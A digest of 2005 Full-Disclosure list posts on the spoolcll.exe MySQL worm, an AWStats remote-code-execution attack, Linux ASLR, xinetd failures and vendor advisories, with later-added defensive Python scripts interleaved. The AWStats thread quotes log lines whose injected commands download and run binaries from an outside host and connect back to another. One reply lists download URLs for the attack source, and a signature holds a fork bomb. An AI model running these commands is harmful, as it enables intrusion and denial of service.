Copyright 1999-2005 NSFOCUS. All Rights Reserved. Terms of use.

NSFOCUS Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQFB+LIY1794d8am9toRAt5+AJ9fhmdoxO3wi4px9hPTftLUDfRllgCfYequ
nhWVWcvuVIs8339yXR+TiPU=
=yjQM
-----END PGP SIGNATURE-----



 
[Full-Disclosure] Security Contact in Vonage

From: Noam Rathaus (noamr@beyondsecurity.com)
Date: Thu Jan 27 2005 - 07:11:24 CST


Hi,

I am looking for a security contact at Vonage (www.vonage.com). I have tried
more than once to call their number, and have stopped waiting after 15 minutes
of being put on hold.

--

Noam Rathaus
CTO
Beyond Security Ltd.

http://www.beyondsecurity.com
http://www.securiteam.com


 
[Full-Disclosure] Possible new MYSql Worm

From: Thierry Zoller (Thierry@sniff-em.com)
Date: Thu Jan 27 2005 - 10:57:50 CST


Dear List ,
Watch out for "Spoolcll.exe" or connects to port 3306.
http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
http://isc.sans.org/index.php

--
Thierry Zoller
http://www.sniff-em.com/secureit.shtml



 
Re: [Full-Disclosure] MDKSA-2005:020 - Updated kdegraphics packages fix buffer overflow vulnerability

From: Vincent Danen (vdanen@mandrakesoft.com)
Date: Thu Jan 27 2005 - 09:49:08 CST


On Jan 25, 2005, at 22:57, Rembrandt wrote:

> On Tue, 25 Jan 2005 21:51:01 -0700
> Mandrake Linux Security Team <security@linux-mandrake.com> wrote:
>
> Dear Mandrake Linux Security Team,
> Why can't you spam another mailing list?
> Or create your own for your PATCHES....
>
> It gets on my nerves to get more than one mail from you a month.
> How do you provide something?
> Code? Proof-of-concept exploits?
> You just write "We fixed..."
> Or in other words "Hey guys, there's something wrong with a package
> related to our OS."
>
> If MS sent a mail to this mailing list for every patch they wrote, the
> list owner would kick MS out for that.
> I don't know why it should be different for you or any other OS.

Hmmm... like many other vendors, we "spam" a number of mailing lists
(FD, bugtraq (when they feel like putting new messages through), and
our own security-announce list). Do you rant at Gentoo, Debian,
Ubuntu... (the list goes on) as well?

Anyways, you seem to be a moderately intelligent person, so why don't
you set up a filter in sylpheed to send all mail from
security@linux-mandrake.com to /dev/null? Should be pretty
straightforward. That way you don't have to get "nerved" and the
people who do appreciate the advisories can continue to receive them.

If the list owners asked us to stop, we would respectfully do it. But,
since you're asking, I think I'll just leave it up to you to figure out
how to filter mail (it's a fairly amazing concept once you get it
figured out).

--
"lynx -source http://linsec.ca/vdanen.asc | gpg --import"
{FEE30AD4 : 7F6C A60C 06C2 4811 FA1C A2BC 2EBC 5E32 FEE3 0AD4}

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (Darwin)

iD8DBQFB+Q10LrxeMv7jCtQRAlBDAJ9VdVpyNtRFYWQp6j/BVGopnEp23gCgq5jX
FNU6XI5KLeZtPtyI6zaMLu0=
=v2d5
-----END PGP SIGNATURE-----



 
Re: [Full-Disclosure] "Advances in Security" in the Linux Kernel and RedHat idiocy

From: Arjan van de Ven (arjanv@redhat.com)
Date: Thu Jan 27 2005 - 11:28:12 CST


On Thu, Jan 27, 2005 at 11:10:43AM -0500, Brad Spengler wrote:
> Just wanted to point out to you guys the INCREDIBLE advances in Linux
> security underway on LKML from security expert Arjan van de Ven:
>
> http://lkml.org/lkml/2005/1/27/62
>
> On the subject of his i386-only mmap randomization patch:
>
> The randomisation range is 1 megabyte (this is bigger than the stack
> randomisation since the stack randomisation only needs 16 bytes alignment
> while the mmap needs page alignment, a 64kb range would not have given
> enough entropy to be effective)
>
> If we do a little math..
> 1048576 / 4096 = 256
> 65536 / 16 = 4096
>
> 256 different locations for the mmap base, 4096 different locations for
> the stack (and apparently argv/envp pages get no randomization)
>
> Anyone with half a brain would see this is a joke, but not security
> expert Arjan van de Ven:

I think the joke is on you in this case. There is a large patch series, of
which you judge the first steps only. Those steps introduce the
infrastructure and concepts into the kernel, and later patches will tweak
the exact numbers to values with more entropy, ONCE THE EXISTING
INFRASTRUCTURE IS ACCEPTED AND DEBUGGED.

Maybe you don't understand that; I assume a lot of the other readers of this
list do. You don't plop a huge patch into the Linux kernel in one chunk. You
do it in nice small, incremental and debuggable steps.



 
Re: [Full-Disclosure] spoolcll.exe - new worm being distributed via mysql vulnerability?

From: Jeremy Davis (jdaytona@gmail.com)
Date: Thu Jan 27 2005 - 11:23:20 CST


Check out todays diary at SANS.
http://isc.sans.org/

On Thu, 27 Jan 2005 00:18:21 -0500, Mike Bailey <worried@gmail.com> wrote:
> Aloha,
>
> Earlier tonight I was sitting here at home doing some normal
> browsing and work, and my firewall alerted me that a program called
> spoolcll.exe was attempting to open up a port which I cannot remember
> now.
>
> I tried killing it, but it just came back, over and over again, each
> time spawning itself on a new port.
>
> The registry says the worm created a service called "evmon"; it cannot be
> paused or stopped, but it can be disabled.
>
> The only information about this worm on Google is a discussion at the
> following URL: http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
> They are beginning to determine that it is being distributed via a hole
> in MySQL.
>
> Do any of you know anything about this? Thanks in advance.
>
> --
> Love,
> Mike Bailey
>


 
RE: [Full-Disclosure] spoolcll.exe - new worm being distributed viamysql vulnerability?

From: Dolan, Patrick (Patrick.Dolan@phns.com)
Date: Thu Jan 27 2005 - 11:47:57 CST


From the article text:

"The bot uses the "MySQL UDF Dynamic Library Exploit". In order to
launch the exploit, the bot first has to authenticate to mysql as 'root'
user. A long list of passwords is included with the bot, and the bot
will brute force the password."

Looks like this is small part exploit, and large part bad root password
selection. Though I'm not even sure about the exploit part because the
text later says:

"This bot does not use any vulnerability in mysql. The fundamental
weakness it uses is a week[sic] 'root' account."

Patrick Dolan
Information Security Analyst
 
 

-----Original Message-----
From: Jeremy Davis [mailto:jdaytonagmail.com]
Sent: Thursday, January 27, 2005 11:23 AM
To: Mike Bailey
Cc: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] spoolcll.exe - new worm being distributed
viamysql vulnerability?

Check out todays diary at SANS.
http://isc.sans.org/

On Thu, 27 Jan 2005 00:18:21 -0500, Mike Bailey <worriedgmail.com>
wrote:
> Aloha,
>
> Earlier tonight, I was sitting here at home doing some normal
> browsing and work, and my firewall alerted me that a program called
> spoolcll.exe was attempting to open up a port which I cannot remember
> now.
>
> I tried killing it, but it just came back, over and over again each
> time spawning itself on a new port.
>
> Registry says the worm created a service called "evmon", it cannot be
> paused or stopped, but it can be disabled.
>
> The only information about this worm on google is a discussion at the
> following url:
> http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
> they are beginning to determine that it is being distributed via a hole
> in mysql.
>
> Do any of you know anything about this? Thanks in advance.
>
> --
> Love,
> Mike Bailey


 
Re: [Full-Disclosure] spoolcll.exe - new worm being distributed via mysql vulnerability?

From: stephane nasdrovisky (stephane.nasdroviskyparadigmo.com)
Date: Thu Jan 27 2005 - 12:02:55 CST


>> my firewall alerted me that a program called spoolcll.exe
>> the worm created a service called "evmon"
>>
>> The only information about this worm on google is a discussion at the
>> following url:
>> http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
>> they are beginning to determine that it is being distributed via a hole
>> in mysql.
>
There is a slashdot.org article & comments. It looks like it exploits a
few sysadmin brain vulnerabilities: weak password, bad practice. I guess
the mysql vulnerability is required for copying & executing the bot.

http://it.slashdot.org/it/05/01/27/1546222.shtml?tid=220&tid=172&tid=95

*Don't keep the port open!*
by hackergnu-designs.com
99.99% of people who run MySQL run it on the same machine as their
webserver that queries it. Most people don't actually do queries /across
the network/ to the database server.
Just run MySQL with --skip-networking at startup (skip-networking in
my.cnf), to disable MySQL from listening on port 3306.



 
Re: [Full-Disclosure] spoolcll.exe - new worm being distributed via mysql vulnerability?

From: Jeremy Davis (jdaytonagmail.com)
Date: Thu Jan 27 2005 - 11:55:44 CST


Definitely confusing, but I believe it stems from a weak root passwd.
"the bot first has to authenticate to mysql as 'root'
user." then it seems to launch the exploit allowing it access to
create the dynamic libraries containing User Defined Functions.

On Thu, 27 Jan 2005 11:47:57 -0600, Dolan, Patrick
<Patrick.Dolanphns.com> wrote:
> From the article text:
>
> "The bot uses the "MySQL UDF Dynamic Library Exploit". In order to
> launch the exploit, the bot first has to authenticate to mysql as 'root'
> user. A long list of passwords is included with the bot, and the bot
> will brute force the password."
>
> Looks like this is small part exploit, and large part bad root password
> selection. Though I'm not even sure about the exploit part because the
> text later says:
>
> "This bot does not use any vulnerability in mysql. The fundamental
> weakness it uses is a week[sic] 'root' account."
>
> Patrick Dolan
> Information Security Analyst
>
> -----Original Message-----
> From: Jeremy Davis [mailto:jdaytonagmail.com]
> Sent: Thursday, January 27, 2005 11:23 AM
> To: Mike Bailey
> Cc: full-disclosurelists.netsys.com
> Subject: Re: [Full-Disclosure] spoolcll.exe - new worm being distributed
> via mysql vulnerability?
>
> Check out today's diary at SANS.
> http://isc.sans.org/
>
> On Thu, 27 Jan 2005 00:18:21 -0500, Mike Bailey <worriedgmail.com>
> wrote:
> > Aloha,
> >
> > Earlier tonight, I was sitting here at home doing some normal
> > browsing and work, and my firewall alerted me that a program called
> > spoolcll.exe was attempting to open up a port which I cannot remember
> > now.
> >
> > I tried killing it, but it just came back, over and over again each
> > time spawning itself on a new port.
> >
> > Registry says the worm created a service called "evmon", it cannot be
> > paused or stopped, but it can be disabled.
> >
> > The only information about this worm on google is a discussion at the
> > following url:
> > http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
> > they are beginning to determine that it is being distributed via a hole
> > in mysql.
> >
> > Do any of you know anything about this? Thanks in advance.
> >
> > --
> > Love,
> > Mike Bailey


 
[Full-Disclosure] Re: [ GLSA 200501-36 ] AWStats: Remote code execution

From: Joao Victor A. Di Stasi (jvictor_rjyahoo.com.br)
Date: Thu Jan 27 2005 - 11:38:58 CST


Delian Krustev wrote:

>There's an exploit in the wild. Here's what it does:
>
>200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
>200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
>
>I don't have the time to investigate the "cgi" and "dc" binaries.
>The "cgi" at least tries to daemonize and opens a TCP listening socket.
>They also try to replace the index page on the vulnerable site.
>
>
>
On the same site you can download:

wget http://www.nokiacentrum.cz/dcha0s/dc.c
wget http://www.nokiacentrum.cz/dcha0s/cgi.c


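A defender-side check for the request pattern quoted above, added here as an illustration (it is not code from Delian Krustev, from Joao, or from the AWStats project): it parses Common Log Format lines, decodes the query string without splitting on ';', and flags awstats.pl requests whose configdir value begins with a pipe, pulling out the commands and download URLs for the incident record. The two attack lines are the ones quoted in the post; the benign line and its 10.0.0.7 address are constructed.

```python
"""Scan web-server access-log lines for the AWStats configdir command
injection quoted in the thread. Added illustration, not code from the
thread or from AWStats. ATTACK_LINES are taken from Delian Krustev's
post; BENIGN_LINE is constructed."""
import re
from urllib.parse import unquote

# Common Log Format with the usual referer / user-agent tail.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
URL_RE = re.compile(r"https?://[^\s;'\"]+")

ATTACK_LINES = [
    '200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
]
# Constructed: an ordinary report request that must not be flagged.
BENIGN_LINE = '10.0.0.7 - - [26/Jan/2005:07:00:00 +0000] "GET /cgi-bin/awstats/awstats.pl?config=example.com&output=main HTTP/1.1" 200 12345 "-" "Mozilla/5.0"'
SAMPLE_LOG = ATTACK_LINES + [BENIGN_LINE]


def query_params(uri):
    """Split the query string on '&' only (';' is part of the injected
    payload, so it must not be treated as a separator) and percent-decode."""
    if "?" not in uri:
        return {}
    params = {}
    for part in uri.split("?", 1)[1].split("&"):
        key, _, value = part.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def inspect_awstats_request(line):
    """Return a finding for an awstats.pl request whose configdir value
    starts with '|' (Perl's two-argument open() runs such a value as a
    command, which is what the quoted requests rely on), else None."""
    m = CLF.match(line)
    if not m or "awstats.pl" not in m["uri"]:
        return None
    configdir = query_params(m["uri"]).get("configdir", "")
    if not configdir.startswith("|"):
        return None
    payload = configdir.lstrip("|").rstrip("\x00")  # %00 terminates the Perl string
    return {
        "source_ip": m["ip"],
        "timestamp": m["ts"],
        "status": int(m["status"]),
        "commands": [c.strip() for c in payload.split(";") if c.strip()],
        "urls": URL_RE.findall(payload),  # download locations worth blocking / reporting
    }


def scan(lines):
    """All findings for an iterable of access-log lines, in log order."""
    return [f for f in (inspect_awstats_request(l) for l in lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["timestamp"], finding["source_ip"], finding["commands"], finding["urls"])
```

The status code is kept in the finding on purpose: a 200 on such a request, as in both quoted lines, says the script ran rather than rejected the input, which changes the response from "blocked probe" to "host compromised".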

 
Re: [Full-Disclosure] "Advances in Security" in the Linux Kernel and RedHat idiocy

From: Brad Spengler (spendergrsecurity.net)
Date: Thu Jan 27 2005 - 12:21:45 CST


> I think the joke is on you in this case. There is a large patch series of
> which you judge the first steps only. Those steps introduce the
> infrastructure and concepts into the kernel, and later patches will tweak
> the exact numbers to values with more entropy. ONCE THE EXISTING
> INFRASTRUCTURE IS ACCEPTED AND DEBUGGED.
>
> Maybe you don't understand that, I assume a lot of the other readers of this
> list do. You don't plop a huge patch in the linux kernel in one chunk. You
> do it in nice small, incremental and debuggable steps.

If Exec-shield is any model for what you plan to turn this into, my
comments still apply. If you like, I'll simply send out the same email
months from now when you "finalize" this patch into the level of
security you claim it to be able to provide (which will never happen,
since you won't be providing any bruteforce deterrence, so it doesn't
matter if you increase the randomization by a couple more bits).

I should also add that the stack randomization present in this patch and
that in exec-shield can be bypassed by tossing enough data into the
stack, like "/bin/sh" over and over, since the amount of randomization
is smaller than the stack itself. I should also note that the latest
output of paxtest I could find against exec-shield shows that the amount
of randomization for shared libraries is the same as in the patch you
sent to LKML. So if your argument is that you agree these values are
stupidly low, you're not saying much about your own "enterprise-grade"
software ;)

I would also like to correct a mistake in my previous mail. The glibc
issues are indeed fixed in the latest FC3 glibc, which was released on
December 27th, 2004, nearly 3 1/2 months after the bug was initially
reported. The glibc update was not released as a security update
however, so many users are still affected (like the two Fedora
developers I contacted).

-Brad

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFB+TE3mHm2SUJF1GoRAocUAJ9lWKmXRmLfLKBI7AVj7hFiMRQpJgCcDqn8
BioS7BJGN38ChiJRZ5WdAiY=
=H4S9
-----END PGP SIGNATURE-----



 
Re: [Full-Disclosure] "Advances in Security" in the Linux Kernel and RedHat idiocy

From: Michal Zalewski (lcamtufghettot.org)
Date: Thu Jan 27 2005 - 13:37:19 CST


On Thu, 27 Jan 2005, Brad Spengler wrote:

> I guess anyone who thinks that taking a hardcoded exploit and running it
> 256 times would always result in a successful exploit is stupid.

It would not always result in a successful exploitation; just as flipping
the coin twice is not a guarantee of getting tails once.

Other than that, the amount of randomization is indeed puny; but then,
even 32-bit randomization is a good defense only in certain situations,
and often, can be defeated with some time, aided by luck or a decent
NOP-equivalent sled.

--
------------------------- bash$ :(){ :|:&};: --
 Michal Zalewski * [http://lcamtuf.coredump.cx]
    Did you know that clones never use mirrors?
--------------------------- 2005-01-27 20:31 --

   http://lcamtuf.coredump.cx/photo/current/


 
RE: [lists] [Full-Disclosure] Terminal Server vulnerabilities

From: ALD, Aditya, Aditya Lalit Deshmukh (aditya.deshmukhonline.gateway.expertworks.net)
Date: Thu Jan 27 2005 - 13:36:53 CST


>It's also only possible when you've got NetBIOS/CIFS open to
>the Internet,

Yes I know... That is why I said security thru obscurity

> With this argumentation, you could sell your firewalls.

No, I would not. I would use an IDS with properly tuned sigs for the terminal
server and then connect the terminal server via a proxy like VNC running on
something over FreeBSD or Linux. I would never allow a Windows terminal
server to be directly connected to the net...

-aditya



 
[Full-Disclosure] xinetd issue..

From: Juan Pablo Abuyeres (jpabuyertecnoera.com)
Date: Thu Jan 27 2005 - 13:48:05 CST


I have 2 servers running FC2, with xinetd-2.3.13-2 and
proftpd-1.2.10-8.1.fc2.dag. The ftp servers are configured to run
through xinetd.
xinetd is configured with "cps = 25 30", which is the default.
If I flood ftp connections, xinetd behaves like expected:

Jan 27 15:25:35 horus xinetd[628]: Deactivating service ftp due to
excessive incoming connections. Restarting in 30 seconds.
Jan 27 15:26:05 horus xinetd[628]: Activating service ftp

But a few days ago, my FTP servers were down, and when I checked, this is
what I found:

Jan 25 21:05:40 horus xinetd[4479]: Deactivating service ftp due to
excessive incoming connections. Restarting in 30 seconds.
Jan 25 21:06:10 horus xinetd[4479]: bind failed (Address already in use
(errno = 98)). service = ftp
Jan 25 21:06:10 horus xinetd[4479]: Error activating service ftp
Jan 25 21:06:10 horus xinetd[32743]: Failed to contact identity server
at 83.198.168.197: timeout

Jan 26 10:00:28 horus xinetd[29729]: Service ftp: server exit with 0
running servers
Jan 26 11:35:51 horus xinetd[29729]: Deactivating service ftp due to
excessive incoming connections. Restarting in 30 seconds.
Jan 26 11:36:21 horus xinetd[25685]: Failed to contact identity server
at 195.7.124.194: timeout
Jan 26 11:36:21 horus xinetd[29729]: bind failed (Address already in use
(errno = 98)). service = ftp
Jan 26 11:36:21 horus xinetd[29729]: Error activating service ftp

I've tried to reproduce this, with no luck. This happened on both servers
at almost the same time. They have the same install base and rpms. Can
anybody give some advice on this please?

Thank you.


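One way to turn the symptom in these logs into an alert, added as an example (it is not code from the poster or from xinetd): a small state machine over syslog lines that pairs each "Deactivating service" message with the "Activating service" that should follow it, and reports the service as down when xinetd instead logs "Error activating service", attaching the bind-failure reason. The sample log is the poster's own lines, rejoined where the mail wrapped them and put in chronological order; the regular expressions assume the message formats shown there.

```python
"""Detect an xinetd service that was deactivated by the cps limit and
never came back. Added illustration, not from the poster or xinetd.
SAMPLE_LOG consists of the log lines quoted in the post, rejoined."""
import re

SAMPLE_LOG = """\
Jan 25 21:05:40 horus xinetd[4479]: Deactivating service ftp due to excessive incoming connections. Restarting in 30 seconds.
Jan 25 21:06:10 horus xinetd[4479]: bind failed (Address already in use (errno = 98)). service = ftp
Jan 25 21:06:10 horus xinetd[4479]: Error activating service ftp
Jan 25 21:06:10 horus xinetd[32743]: Failed to contact identity server at 83.198.168.197: timeout
Jan 26 10:00:28 horus xinetd[29729]: Service ftp: server exit with 0 running servers
Jan 26 11:35:51 horus xinetd[29729]: Deactivating service ftp due to excessive incoming connections. Restarting in 30 seconds.
Jan 26 11:36:21 horus xinetd[25685]: Failed to contact identity server at 195.7.124.194: timeout
Jan 26 11:36:21 horus xinetd[29729]: bind failed (Address already in use (errno = 98)). service = ftp
Jan 26 11:36:21 horus xinetd[29729]: Error activating service ftp
Jan 27 15:25:35 horus xinetd[628]: Deactivating service ftp due to excessive incoming connections. Restarting in 30 seconds.
Jan 27 15:26:05 horus xinetd[628]: Activating service ftp
"""

SYSLOG = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"xinetd\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
DEACT = re.compile(r"Deactivating service (\S+) due to excessive incoming connections")
ACT = re.compile(r"^Activating service (\S+)$")
BIND = re.compile(r"bind failed \((.*)\)\. service = (\S+)")
ERR = re.compile(r"Error activating service (\S+)")


def analyse_xinetd(lines):
    """Return one alert per (host, service) that xinetd deactivated and
    then failed to reactivate, plus one for any deactivation still
    unresolved at the end of the log."""
    pending = {}   # (host, service) -> timestamp of the deactivation
    reasons = {}   # (host, service) -> text of the most recent bind failure
    alerts = []
    for line in lines:
        m = SYSLOG.match(line)
        if not m:
            continue
        host, ts, msg = m["host"], m["ts"], m["msg"]
        d = DEACT.search(msg)
        a = ACT.match(msg)
        b = BIND.search(msg)
        e = ERR.search(msg)
        if d:
            pending[(host, d[1])] = ts
        elif a:                                   # normal recovery after the 30 s pause
            pending.pop((host, a[1]), None)
            reasons.pop((host, a[1]), None)
        elif b:
            reasons[(host, b[2])] = b[1]
        elif e:                                   # xinetd gave up: the service stays down
            key = (host, e[1])
            alerts.append({
                "host": host, "service": e[1],
                "deactivated_at": pending.pop(key, None), "failed_at": ts,
                "reason": reasons.pop(key, "unknown"),
            })
    for (host, service), ts in pending.items():   # deactivated, no outcome logged yet
        alerts.append({"host": host, "service": service, "deactivated_at": ts,
                       "failed_at": None, "reason": "no reactivation logged"})
    return alerts


if __name__ == "__main__":
    for alert in analyse_xinetd(SAMPLE_LOG.splitlines()):
        print(f"{alert['host']} {alert['service']} down since {alert['deactivated_at']}: {alert['reason']}")
```

The point of the pairing is that the "Deactivating" line on its own is normal (the poster's Jan 27 flood test shows the expected recovery); only the missing or failed "Activating" is actionable. Feeding this to whatever watches syslog would have flagged both servers within a minute on Jan 25 instead of days later.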

 
Re: [lists] [Full-Disclosure] Terminal Server vulnerabilities

From: Jan Muenther (jan.muenthernruns.com)
Date: Thu Jan 27 2005 - 14:11:09 CST


> No, I would not. I would use an IDS with properly tuned sigs for the terminal
> server and then connect the terminal server via a proxy like VNC running on
> something over FreeBSD or Linux. I would never allow a Windows terminal
> server to be directly connected to the net...

Spot the two obvious mistakes in this reply.

I retreat from the discussion, should've held back my first comment.

j.


 
RE: [Full-Disclosure] Terminal Server vulnerabilities

From: Stuart Fox (DSL AK) (StuartFdatacom.co.nz)
Date: Thu Jan 27 2005 - 14:27:39 CST


>> But I would point out something much more important : there are many
>> more local exploits than remote (on Windows just like any other OS).
>>
>> Local exploits : about 1-2 a month
>> * POSIX - OS/2 subsystem exploitation
>> * Debugging subsystem exploitation (DebPloit)
>> * 16-bit subsystem exploitation (NTVDM)
>> * Shatter Attacks
>> * Etc.
>>
>> Remote exploits : about once a year
>> * RPC/DCOM (blaster)
>> * LSASS (sasser)
>>
>> Basically, if you are logged in as an unprivileged user on a Terminal
>> Server, you can easily become SYSTEM. If this Terminal Server is also a
>> Domain Controller, game over.
>
>You forgot one important factor - the use of IE and Outlook for the fast
>direct-to-customer delivery of local exploits. Which *also* results in
>a Game Over....
 
Assuming that the IE/Outlook bugs are privilege escalation bugs. There seem to be relatively few of those - all of the recent ones have given you credentials of the local user, not localsystem (or even admin).



 
[Full-Disclosure] CarolinaCon 2005 announcement

From: Vic Vandal (vvandalwell.com)
Date: Thu Jan 27 2005 - 16:19:32 CST


Various chapters of NC-2600 (Raleigh, Wilmington, Charlotte,
Asheville, etc) are proud to announce the coming of:
"CarolinaCon-2005"
The event will be June 10th-12th in Raleigh, NC.

If interested in attending and/or presenting, please see the
following link for existing and emerging details:
http://www.carolinacon.org

The only currently active links are Location (where registration/
reservations can be made) and Speakers (kinda obvious).

Peace,
Vic


 
[Full-Disclosure] Re: Full-Disclosure Digest, Vol 2, Issue 58

From: Luisma (lbarreirogmail.com)
Date: Thu Jan 27 2005 - 16:06:16 CST


On Thu, 27 Jan 2005 11:51:08 -0500 (EST),
full-disclosure-requestlists.netsys.com
> Message: 8
> Date: Thu, 27 Jan 2005 00:18:21 -0500
> From: Mike Bailey <worriedgmail.com>
> Subject: [Full-Disclosure] spoolcll.exe - new worm being distributed
> via mysql vulnerability?
> To: full-disclosurelists.netsys.com
> Message-ID: <a50eeaa105012621182064e7a9mail.gmail.com>
> Content-Type: text/plain; charset=US-ASCII
>
> Aloha,
>
> Earlier tonight, I was sitting here at home doing some normal
> browsing and work, and my firewall alerted me that a program called
> spoolcll.exe was attempting to open up a port which I cannot remember
> now.
>
> I tried killing it, but it just came back, over and over again each
> time spawning itself on a new port.
>
> Registry says the worm created a service called "evmon", it cannot be
> paused or stopped, but it can be disabled.
>
> The only information about this worm on google is a discussion at the
> following url: http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
> they are beginning to determine that it is being distributed via a hole
> in mysql.
>
> Do any of you know anything about this? Thanks in advance.
>
> --
> Love,
> Mike Bailey
>
> ------------------------------

It's a sort of new worm looking for MySQL weak root passwords. You can get
more info at SANS:

http://isc.sans.org/diary.php?isc=a508f4a185755af19ea8bd45444a570b

Boot in Safe Mode and delete that file. Then reboot. Of course, change
your admin pass and firewall tcp port 3306.

--
Saludos/Regards

Luisma
-------------------------------------------------------------
Chaos reigns within. Reflect, repent, and reboot. Order shall return.

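The two mitigations proposed in this thread, skip-networking (the slashdot comment quoted by stephane) and firewalling tcp port 3306 (Luisma), both come down to whether mysqld is reachable over the network at all. The following audit of a my.cnf [mysqld] section is an added example, not code from either poster or from MySQL: it reports whether the TCP listener is disabled, bound to loopback, or reachable from other hosts, with the port to firewall in the latter case. The configuration fragments are constructed; bind-address is assumed to be honoured by the mysqld in use.

```python
"""Audit the [mysqld] section of a my.cnf for network exposure: is
skip-networking set, and if not, where does mysqld listen? Added
illustration, not from the thread or from MySQL. The four configs are
constructed examples."""
import configparser
import ipaddress

WEAK_CNF = """
[client]
port = 3306

[mysqld]
datadir = /var/lib/mysql
port = 3306
# neither bind-address nor skip-networking: every host that can reach
# tcp/3306 gets to try the root password
"""

HARDENED_CNF = """
[mysqld]
datadir = /var/lib/mysql
skip-networking
"""

LOCAL_ONLY_CNF = """
[mysqld]
datadir = /var/lib/mysql
bind-address = 127.0.0.1
"""

ALL_IFACES_CNF = """
[mysqld]
bind-address = 0.0.0.0   # explicit wildcard, same exposure as no bind-address
port = 3307
"""


def parse_mycnf(text):
    """Return the [mysqld] options as {name: value}; bare options such as
    skip-networking get None. Underscores are folded to dashes because
    mysqld accepts either spelling. Lines starting with '!' (include
    directives) are dropped: what they pull in is not visible here."""
    cleaned = "\n".join(l for l in text.splitlines() if not l.lstrip().startswith("!"))
    cp = configparser.ConfigParser(allow_no_value=True, strict=False,
                                   interpolation=None, inline_comment_prefixes=("#",))
    cp.read_string(cleaned)
    if not cp.has_section("mysqld"):
        return {}
    return {k.lower().replace("_", "-"): v for k, v in cp.items("mysqld")}


def _ip(addr):
    try:
        return ipaddress.ip_address(addr)
    except ValueError:
        return None


def audit_mysqld(opts):
    """Findings (strings) for the given [mysqld] options; empty when the
    server is unreachable over TCP from other hosts."""
    if "skip-networking" in opts:
        return []                       # no TCP listener at all
    port = opts.get("port") or "3306"
    addr = opts.get("bind-address")
    if addr is None:
        return [f"no bind-address and no skip-networking: mysqld listens on every interface on tcp/{port}"]
    ip = _ip(addr)
    if addr == "localhost" or (ip is not None and ip.is_loopback):
        return []                       # reachable only from this host
    if ip is not None and ip.is_unspecified:
        return [f"bind-address {addr} means every interface: mysqld reachable on tcp/{port}"]
    return [f"bind-address {addr} is not loopback: confirm tcp/{port} is firewalled"]


if __name__ == "__main__":
    for name, cnf in [("weak", WEAK_CNF), ("hardened", HARDENED_CNF),
                      ("local-only", LOCAL_ONLY_CNF), ("all-interfaces", ALL_IFACES_CNF)]:
        print(name, audit_mysqld(parse_mycnf(cnf)) or ["ok"])
```

This checks the listener, not the credential: a server that must be reachable from a web host on another machine still needs the firewall rule and a root password that is not on the bot's list, and the audit's last message is worded as a prompt for exactly that.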

 
[Full-Disclosure] MDKSA-2005:024 - Updated evolution packages fix vulnerability

From: Mandrakelinux Security Team (securitylinux-mandrake.com)
Date: Thu Jan 27 2005 - 16:20:36 CST


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

                 Mandrakelinux Security Update Advisory
 _______________________________________________________________________

 Package name: evolution
 Advisory ID: MDKSA-2005:024
 Date: January 27th, 2005

 Affected versions: 10.0, 10.1, Corporate Server 3.0
 ______________________________________________________________________

 Problem Description:

 Max Vozeler discovered an integer overflow in the camel-lock-helper
 application. This application is installed setgid mail by default.
 A local attacker could exploit this to execute malicious code with
 the privileges of the "mail" group; likewise a remote attacker could
 set up a malicious POP server to execute arbitrary code when an
 Evolution user connects to it.
 
 The updated packages have been patched to prevent this problem.
 _______________________________________________________________________

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0102
 ______________________________________________________________________

 Updated Packages:
  
 Mandrakelinux 10.0:
 3397788a5d8a84d8fd1294225bdfa546 10.0/RPMS/evolution-1.4.6-5.1.100mdk.i586.rpm
